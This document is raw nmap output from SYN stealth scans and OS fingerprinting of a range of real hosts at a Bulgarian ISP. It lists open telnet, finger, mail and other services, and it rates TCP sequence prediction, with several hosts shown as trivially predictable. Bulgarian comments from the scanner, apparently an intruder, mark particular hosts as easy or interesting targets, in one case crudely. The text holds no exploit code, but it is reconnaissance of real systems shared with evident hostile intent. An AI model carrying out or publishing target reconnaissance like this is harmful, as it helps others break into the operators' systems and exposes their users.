Remote OS guesses: Windows NT4 / Win95 / Win98, Windows NT 5 Beta2
OS Fingerprint:
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=S++%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
Host pppsof6.infotel.bg (212.39.65.134) appears to be down, skipping it.
Host pppsof7.infotel.bg (212.39.65.135) appears to be up ... good.
Initiating SYN half-open stealth scan against pppsof7.infotel.bg (212.39.65.135)
The SYN scan took 316 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on pppsof7.infotel.bg (212.39.65.135):
Port State Protocol Service
21 filtered tcp ftp
49 filtered tcp unknown
80 filtered tcp www
111 filtered tcp sunrpc
Remote OS guesses: Windows NT4 / Win95 / Win98, Windows NT 5 Beta2
OS Fingerprint:
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=S++%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
Host pppsof8.infotel.bg (212.39.65.136) appears to be down, skipping it.
Host pppsof9.infotel.bg (212.39.65.137) appears to be down, skipping it.
Host pppsof10.infotel.bg (212.39.65.138) appears to be up ... good.
Initiating SYN half-open stealth scan against pppsof10.infotel.bg (212.39.65.138)
The SYN scan took 397 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on pppsof10.infotel.bg (212.39.65.138):
(Not showing ports in state: filtered)
Port State Protocol Service
No OS matches for this host. TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)
Host pppsof11.infotel.bg (212.39.65.139) appears to be up ... good.
Initiating SYN half-open stealth scan against pppsof11.infotel.bg (212.39.65.139)
The SYN scan took 78 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on pppsof11.infotel.bg (212.39.65.139):
Port State Protocol Service
21 filtered tcp ftp
49 filtered tcp unknown
80 filtered tcp www
111 filtered tcp sunrpc
No OS matches for this host. TCP fingerprints:
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
Host pppsof12.infotel.bg (212.39.65.140) appears to be down, skipping it.
Host pppsof13.infotel.bg (212.39.65.141) appears to be up ... good.
Initiating SYN half-open stealth scan against pppsof13.infotel.bg (212.39.65.141)
The SYN scan took 397 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on pppsof13.infotel.bg (212.39.65.141):
(Not showing ports in state: filtered)
Port State Protocol Service
No OS matches for this host. TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)
Host pppsof14.infotel.bg (212.39.65.142) appears to be down, skipping it.
Host pppsof15.infotel.bg (212.39.65.143) appears to be down, skipping it.
Host pppsof16.infotel.bg (212.39.65.144) appears to be down, skipping it.
Host pppsof17.infotel.bg (212.39.65.145) appears to be up ... good.
Initiating SYN half-open stealth scan against pppsof17.infotel.bg (212.39.65.145)
Adding TCP port 59 (state Open).
Adding TCP port 79 (state Open).
Adding TCP port 113 (state Open).
The SYN scan took 19 seconds to scan 120 ports.
For OSScan assuming that port 59 is open and port 33587 is closed and neither are firewalled
Interesting ports on pppsof17.infotel.bg (212.39.65.145):
Port State Protocol Service
21 filtered tcp ftp
49 filtered tcp unknown
59 open tcp unknown
79 open tcp finger
80 filtered tcp www
111 filtered tcp sunrpc
113 open tcp auth
TCP Sequence Prediction: Class=random positive increments
Difficulty=476 (Medium)
Sequence numbers: 753694 753AE5 753D62 7540FA 754876
Remote operating system guess: Windows NT4 / Win95 / Win98
OS Fingerprint:
TSeq(Class=RI%gcd=1%SI=1DC)
T1(Resp=Y%DF=Y%W=16D0%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=Y%DF=Y%W=16D0%ACK=S++%Flags=AS%Ops=M)
T4(Resp=N)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=S++%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
Host pppsof18.infotel.bg (212.39.65.146) appears to be down, skipping it.
Host pppsof19.infotel.bg (212.39.65.147) appears to be up ... good.
Initiating SYN half-open stealth scan against pppsof19.infotel.bg (212.39.65.147)
The SYN scan took 397 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on pppsof19.infotel.bg (212.39.65.147):
(Not showing ports in state: filtered)
Port State Protocol Service
No OS matches for this host. TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)
Host pppsof20.infotel.bg (212.39.65.148) appears to be down, skipping it.
Host pppsof27.infotel.bg (212.39.65.155) appears to be down, skipping it.
Host pppsof28.infotel.bg (212.39.65.156) appears to be up ... good.
Initiating SYN half-open stealth scan against pppsof28.infotel.bg (212.39.65.156)
The SYN scan took 16 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on pppsof28.infotel.bg (212.39.65.156):
Port State Protocol Service
21 filtered tcp ftp
49 filtered tcp unknown
80 filtered tcp www
111 filtered tcp sunrpc
Remote OS guesses: Windows NT4 / Win95 / Win98, Windows NT 5 Beta2
OS Fingerprint:
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=S++%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
Host pppsof29.infotel.bg (212.39.65.157) appears to be down, skipping it.
Host pppsof30.infotel.bg (212.39.65.158) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.65.159) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.65.192) seems to be a subnet broadcast address (returned 2 extra pings). Skipping host.
Host fpn.infotel.bg (212.39.65.193) appears to be up ... good.
Initiating SYN half-open stealth scan against fpn.infotel.bg (212.39.65.193)
Adding TCP port 9 (state Open).
Adding TCP port 13 (state Open).
Adding TCP port 53 (state Open).
Adding TCP port 25 (state Open).
Adding TCP port 7 (state Open).
Adding TCP port 37 (state Open).
Adding TCP port 23 (state Open).
Adding TCP port 119 (state Open).
Adding TCP port 79 (state Open).
Adding TCP port 19 (state Open).
Adding TCP port 110 (state Open).
Adding TCP port 113 (state Open).
The SYN scan took 19 seconds to scan 120 ports.
For OSScan assuming that port 7 is open and port 44655 is closed and neither are firewalled
Interesting ports on fpn.infotel.bg (212.39.65.193):
Port State Protocol Service
7 open tcp echo
9 open tcp discard
13 open tcp daytime
19 open tcp chargen
21 filtered tcp ftp
23 open tcp telnet
25 open tcp smtp
37 open tcp time
49 filtered tcp unknown
53 open tcp domain
79 open tcp finger
80 filtered tcp www
110 open tcp pop3
111 filtered tcp sunrpc
113 open tcp auth
119 open tcp nntp
TCP Sequence Prediction: Class=64K rule
Difficulty=1 (Trivial joke)
Sequence numbers: 50641400 50650E00 50660800 5067FC00 5069F000
Remote operating system guess: HP-UX 10.20 E 9000/777 or A 712/60 with tcp_random_seq = 0
OS Fingerprint:
TSeq(Class=64K)
T1(Resp=Y%DF=Y%W=8000%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=Y%DF=Y%W=8000%ACK=O%Flags=A%Ops=)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=0%UCK=E%ULEN=134%DAT=E)
<[ :))) samo sedi i chaka nqkoj da q ebne ..... ]>
Host unnamed.infotel.bg (212.39.65.194) appears to be down, skipping it.
Host db.infotel.bg (212.39.65.195) appears to be up ... good.
Initiating SYN half-open stealth scan against db.infotel.bg (212.39.65.195)
Adding TCP port 9 (state Open).
Adding TCP port 13 (state Open).
Adding TCP port 25 (state Open).
Adding TCP port 7 (state Open).
Adding TCP port 23 (state Open).
Adding TCP port 37 (state Open).
Adding TCP port 19 (state Open).
Adding TCP port 113 (state Open).
The SYN scan took 13 seconds to scan 120 ports.
For OSScan assuming that port 7 is open and port 35861 is closed and neither are firewalled
For OSScan assuming that port 7 is open and port 42889 is closed and neither are firewalled
Interesting ports on db.infotel.bg (212.39.65.195):
Port State Protocol Service
7 open tcp echo
9 open tcp discard
13 open tcp daytime
19 open tcp chargen
21 filtered tcp ftp
23 open tcp telnet
25 open tcp smtp
37 open tcp time
49 filtered tcp unknown
80 filtered tcp www
111 filtered tcp sunrpc
113 open tcp auth
TCP Sequence Prediction: Class=64K rule
Difficulty=1 (Trivial joke)
Sequence numbers: 54185201 54194C01 541A4601 541B4001 541C3A01 541D3401
Remote operating system guess: HP-UX 10.20 E 9000/777 or A 712/60 with tcp_random_seq = 0
OS Fingerprint:
TSeq(Class=64K)
T1(Resp=Y%DF=Y%W=8000%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=Y%DF=Y%W=8000%ACK=O%Flags=A%Ops=)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=0%UCK=E%ULEN=134%DAT=E)
<[ a tuk mozhe da ima mnogo interesni neshtica ... ]>
Host www1.infotel.bg (212.39.65.196) appears to be up ... good.
Initiating SYN half-open stealth scan against www1.infotel.bg (212.39.65.196)
Adding TCP port 9 (state Open).
Adding TCP port 13 (state Open).
Adding TCP port 53 (state Open).
Adding TCP port 25 (state Open).
Adding TCP port 7 (state Open).
Adding TCP port 23 (state Open).
Adding TCP port 37 (state Open).
Adding TCP port 79 (state Open).
Adding TCP port 19 (state Open).
Adding TCP port 110 (state Open).
The SYN scan took 22 seconds to scan 120 ports.
For OSScan assuming that port 7 is open and port 35473 is closed and neither are firewalled
Interesting ports on www1.infotel.bg (212.39.65.196):
Port State Protocol Service
7 open tcp echo
9 open tcp discard
13 open tcp daytime
19 open tcp chargen
21 filtered tcp ftp
23 open tcp telnet
25 open tcp smtp
37 open tcp time
49 filtered tcp unknown
53 open tcp domain
79 open tcp finger
80 filtered tcp www
110 open tcp pop3
111 filtered tcp sunrpc
TCP Sequence Prediction: Class=64K rule
Difficulty=1 (Trivial joke)
Sequence numbers: 136F9600 13709000 13718A00 13728400 13737E00 13757200
Remote operating system guess: HP-UX 10.20 E 9000/777 or A 712/60 with tcp_random_seq = 0
OS Fingerprint:
TSeq(Class=64K)
T1(Resp=Y%DF=Y%W=8000%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=Y%DF=Y%W=8000%ACK=O%Flags=A%Ops=)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=0%UCK=E%ULEN=134%DAT=E)
Host hdesk.gurko.cits.btc.bg (212.39.65.197) appears to be up ... good.
Initiating SYN half-open stealth scan against hdesk.gurko.cits.btc.bg (212.39.65.197)
Adding TCP port 9 (state Open).
Adding TCP port 13 (state Open).
Adding TCP port 53 (state Open).
Adding TCP port 25 (state Open).
Adding TCP port 7 (state Open).
Adding TCP port 23 (state Open).
Adding TCP port 37 (state Open).
Adding TCP port 19 (state Open).
Adding TCP port 113 (state Open).
The SYN scan took 11 seconds to scan 120 ports.
For OSScan assuming that port 7 is open and port 36042 is closed and neither are firewalled
Insufficient responses for TCP sequencing (3), OS detection will be MUCH less reliable
Interesting ports on hdesk.gurko.cits.btc.bg (212.39.65.197):
Port State Protocol Service
7 open tcp echo
9 open tcp discard
13 open tcp daytime
19 open tcp chargen
21 filtered tcp ftp
23 open tcp telnet
25 open tcp smtp
37 open tcp time
49 filtered tcp unknown
53 open tcp domain
80 filtered tcp www
111 filtered tcp sunrpc
113 open tcp auth
Remote OS guesses: HP-UX 10.20 E 9000/777 or A 712/60 with tcp_random_seq = 0, HP-UX 10.20
OS Fingerprint:
T1(Resp=Y%DF=Y%W=8000%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=Y%DF=Y%W=8000%ACK=O%Flags=A%Ops=)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=0%UCK=E%ULEN=134%DAT=E)
<[ Hdesk ?zvuchi kato HelpDesk ...gurko.cits zvuchki kato tova kude se
namira ...nqkoj hodil lie do CITS na ul.Gurko ? :) ]>
Host unnamed.infotel.bg (212.39.65.198) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.65.198)
Here it is:
3 4 13 1 0 0 0 0 45 0 1 52 1 28 40 0
3F 6 69 B4 C2 C EB C1 C2 8D 19 C1 66 FE C 38
59 B6 1D E
Here it is:
3 4 13 1 0 0 0 0 45 0 1 52 1 28 40 0
3F 6 69 80 C2 C EB C1 C2 8D 19 C1 66 FE C 38
59 B6 1D E
The SYN scan took 397 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.65.198):
(Not showing ports in state: filtered)
Port State Protocol Service
No OS matches for this host. TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)
Host ibm2210.infotel.bg (212.39.65.199) appears to be up ... good.
Initiating SYN half-open stealth scan against ibm2210.infotel.bg (212.39.65.199)
Adding TCP port 9 (state Open).
Adding TCP port 23 (state Open).
The SYN scan took 22 seconds to scan 120 ports.
For OSScan assuming that port 9 is open and port 31016 is closed and neither are firewalled
For OSScan assuming that port 9 is open and port 34912 is closed and neither are firewalled
WARNING: RST from port 9 -- is this port really open?
For OSScan assuming that port 9 is open and port 30676 is closed and neither are firewalled
Interesting ports on ibm2210.infotel.bg (212.39.65.199):
Port State Protocol Service
9 open tcp discard
21 filtered tcp ftp
23 open tcp telnet
49 filtered tcp unknown
80 filtered tcp www
111 filtered tcp sunrpc
TCP Sequence Prediction: Class=trivial time dependency
Difficulty=8 (Trivial joke)
Sequence numbers: 6F2501 6F2545 6F258A 6F25C8 6F2601 6F2651
No OS matches for this host. TCP fingerprints:
TSeq(Class=TD%gcd=1%SI=1B)
TSeq(Class=TD%gcd=1%SI=43)
TSeq(Class=TD%gcd=1%SI=8)
T1(Resp=Y%DF=N%W=200%ACK=S++%Flags=AS%Ops=ML)
T2(Resp=N)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T4(Resp=Y%DF=N%W=0%ACK=S++%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=S++%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
Host br.infotel.bg (212.39.65.200) appears to be up ... good.
Initiating SYN half-open stealth scan against br.infotel.bg (212.39.65.200)
The SYN scan took 13 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on br.infotel.bg (212.39.65.200):
Port State Protocol Service
21 filtered tcp ftp
49 filtered tcp unknown
80 filtered tcp www
111 filtered tcp sunrpc
No OS matches for this host. TCP fingerprints:
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T5(Resp=N)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T6(Resp=N)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T7(Resp=N)
PU(Resp=N)
Host unnamed.infotel.bg (212.39.65.201) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.65.207) seems to be a subnet broadcast address (returned 1 extra pings). Skipping host.
Host unnamed.infotel.bg (212.39.65.208) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.65.208) seems to be a subnet broadcast address (returned 1 extra pings). Skipping host.
Host db.infotel.bg (212.39.65.209) appears to be up ... good.
Initiating SYN half-open stealth scan against db.infotel.bg (212.39.65.209)
Adding TCP port 9 (state Open).
Adding TCP port 13 (state Open).
Adding TCP port 25 (state Open).
Adding TCP port 7 (state Open).
Adding TCP port 70 (state Firewalled).
Adding TCP port 37 (state Open).
Adding TCP port 19 (state Open).
Adding TCP port 113 (state Open).
Adding TCP port 43 (state Firewalled).
Adding TCP port 23 (state Firewalled).
The SYN scan took 16 seconds to scan 120 ports.
For OSScan assuming that port 7 is open and port 30826 is closed and neither are firewalled
For OSScan assuming that port 7 is open and port 30920 is closed and neither are firewalled
Interesting ports on db.infotel.bg (212.39.65.209):
Port State Protocol Service
7 open tcp echo
9 open tcp discard
13 open tcp daytime
19 open tcp chargen
21 filtered tcp ftp
23 filtered tcp telnet
25 open tcp smtp
37 open tcp time
43 filtered tcp whois
49 filtered tcp unknown
70 filtered tcp gopher
80 filtered tcp www
111 filtered tcp sunrpc
113 open tcp auth
TCP Sequence Prediction: Class=64K rule
Difficulty=1 (Trivial joke)
Sequence numbers: 542DCE01 542EC801 542FC201 5430BC01 5431B601 5432B001
Remote operating system guess: HP-UX 10.20 E 9000/777 or A 712/60 with tcp_random_seq = 0
OS Fingerprint:
TSeq(Class=64K)
T1(Resp=Y%DF=Y%W=8000%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=Y%DF=Y%W=8000%ACK=O%Flags=A%Ops=)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=0%UCK=E%ULEN=134%DAT=E)
Host fpn.infotel.bg (212.39.65.210) appears to be up ... good.
Initiating SYN half-open stealth scan against fpn.infotel.bg (212.39.65.210)
Adding TCP port 9 (state Open).
Adding TCP port 13 (state Open).
Adding TCP port 53 (state Open).
Adding TCP port 25 (state Open).
Adding TCP port 7 (state Open).
Adding TCP port 70 (state Firewalled).
Adding TCP port 37 (state Open).
Adding TCP port 119 (state Open).
Adding TCP port 79 (state Open).
Adding TCP port 19 (state Open).
Adding TCP port 110 (state Open).
Adding TCP port 113 (state Open).
Adding TCP port 23 (state Firewalled).
Adding TCP port 43 (state Firewalled).
The SYN scan took 19 seconds to scan 120 ports.
For OSScan assuming that port 7 is open and port 38565 is closed and neither are firewalled
Interesting ports on fpn.infotel.bg (212.39.65.210):
Port State Protocol Service
7 open tcp echo
9 open tcp discard
13 open tcp daytime
19 open tcp chargen
21 filtered tcp ftp
23 filtered tcp telnet
25 open tcp smtp
37 open tcp time
43 filtered tcp whois
49 filtered tcp unknown
53 open tcp domain
70 filtered tcp gopher
79 open tcp finger
80 filtered tcp www
110 open tcp pop3
111 filtered tcp sunrpc
113 open tcp auth
119 open tcp nntp
TCP Sequence Prediction: Class=64K rule
Difficulty=1 (Trivial joke)
Sequence numbers: 55BF2C00 55C21A00 55C60200 55C6FC00 55CAE400 55CBDE00
Remote operating system guess: HP-UX 10.20 E 9000/777 or A 712/60 with tcp_random_seq = 0
OS Fingerprint:
TSeq(Class=64K)
T1(Resp=Y%DF=Y%W=8000%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=Y%DF=Y%W=8000%ACK=O%Flags=A%Ops=)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=0%UCK=E%ULEN=134%DAT=E)
Host www1.infotel.bg (212.39.65.211) appears to be up ... good.
Initiating SYN half-open stealth scan against www1.infotel.bg (212.39.65.211)
Adding TCP port 9 (state Open).
Adding TCP port 13 (state Open).
Adding TCP port 53 (state Open).
Adding TCP port 25 (state Open).
Adding TCP port 7 (state Open).
Adding TCP port 23 (state Firewalled).
Adding TCP port 37 (state Open).
Adding TCP port 79 (state Open).
Adding TCP port 70 (state Firewalled).
Adding TCP port 19 (state Open).
Adding TCP port 110 (state Open).
Adding TCP port 43 (state Firewalled).
The SYN scan took 15 seconds to scan 120 ports.
For OSScan assuming that port 7 is open and port 43012 is closed and neither are firewalled
Interesting ports on www1.infotel.bg (212.39.65.211):
Port State Protocol Service
7 open tcp echo
9 open tcp discard
13 open tcp daytime
19 open tcp chargen
21 filtered tcp ftp
23 filtered tcp telnet
25 open tcp smtp
37 open tcp time
43 filtered tcp whois
49 filtered tcp unknown
53 open tcp domain
70 filtered tcp gopher
79 open tcp finger
80 filtered tcp www
110 open tcp pop3
111 filtered tcp sunrpc
TCP Sequence Prediction: Class=64K rule
Difficulty=1 (Trivial joke)
Sequence numbers: 15658A00 15668400 15687800 15697200 156A6C00 156B6600
Remote operating system guess: HP-UX 10.20 E 9000/777 or A 712/60 with tcp_random_seq = 0
OS Fingerprint:
TSeq(Class=64K)
T1(Resp=Y%DF=Y%W=8000%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=Y%DF=Y%W=8000%ACK=O%Flags=A%Ops=)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=0%UCK=E%ULEN=134%DAT=E)
Host fw.infotel.bg (212.39.65.212) appears to be up ... good.
Initiating SYN half-open stealth scan against fw.infotel.bg (212.39.65.212)
Adding TCP port 109 (state Open).
Adding TCP port 53 (state Open).
Adding TCP port 25 (state Open).
Adding TCP port 23 (state Firewalled).
Adding TCP port 119 (state Open).
Adding TCP port 70 (state Firewalled).
Adding TCP port 43 (state Firewalled).
Adding TCP port 110 (state Open).
The SYN scan took 13 seconds to scan 120 ports.
For OSScan assuming that port 25 is open and port 34434 is closed and neither are firewalled
For OSScan assuming that port 25 is open and port 33472 is closed and neither are firewalled
Interesting ports on fw.infotel.bg (212.39.65.212):
Port State Protocol Service
21 filtered tcp ftp
23 filtered tcp telnet
25 open tcp smtp
43 filtered tcp whois
49 filtered tcp unknown
53 open tcp domain
70 filtered tcp gopher
80 filtered tcp www
109 open tcp pop2
110 open tcp pop3
111 filtered tcp sunrpc
119 open tcp nntp
TCP Sequence Prediction: Class=random positive increments
Difficulty=22031 (Worthy challenge)
Sequence numbers: 33F3C725 33F45449 33F4D856 33F596D9 33F7041A 33F8023D
Remote operating system guess: HP-UX 10.20
OS Fingerprint:
TSeq(Class=RI%gcd=1%SI=560F)
T1(Resp=Y%DF=Y%W=8000%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=Y%DF=Y%W=8000%ACK=O%Flags=A%Ops=)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=0%UCK=E%ULEN=134%DAT=E)
Host unnamed.infotel.bg (212.39.65.213) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.65.214) appears to be down, skipping it.
Host nb.infotel.bg (212.39.65.215) appears to be down, skipping it.
Host switch.infotel.bg (212.39.65.216) appears to be up ... good.
Initiating SYN half-open stealth scan against switch.infotel.bg (212.39.65.216)
Adding TCP port 70 (state Firewalled).
Adding TCP port 23 (state Firewalled).
Adding TCP port 43 (state Firewalled).
The SYN scan took 30 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on switch.infotel.bg (212.39.65.216):
Port State Protocol Service
21 filtered tcp ftp
23 filtered tcp telnet
43 filtered tcp whois
49 filtered tcp unknown
70 filtered tcp gopher
80 filtered tcp www
111 filtered tcp sunrpc
Remote OS guesses: 3Com SuperStack II (unknown OS version), Asanta IntraStack Ethernet Switch (6014 DSB Versions: BP(2.06 ), FW(1.03 )), Asanta IntraSwitch 5324, AsanteHub 2072 Ethernet Hub
OS Fingerprint:
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=APR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=S%Flags=APR%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=APR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
Host unnamed.infotel.bg (212.39.65.217) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.65.218) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.65.219) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.65.220) appears to be down, skipping it.
Host br.infotel.bg (212.39.65.221) appears to be up ... good.
Initiating SYN half-open stealth scan against br.infotel.bg (212.39.65.221)
The SYN scan took 18 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on br.infotel.bg (212.39.65.221):
Port State Protocol Service
21 filtered tcp ftp
49 filtered tcp unknown
80 filtered tcp www
111 filtered tcp sunrpc
No OS matches for this host. TCP fingerprints:
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=N)
Host unnamed.infotel.bg (212.39.65.222) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.65.223) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.65.223) seems to be a subnet broadcast address (returned 1 extra pings). Skipping host.
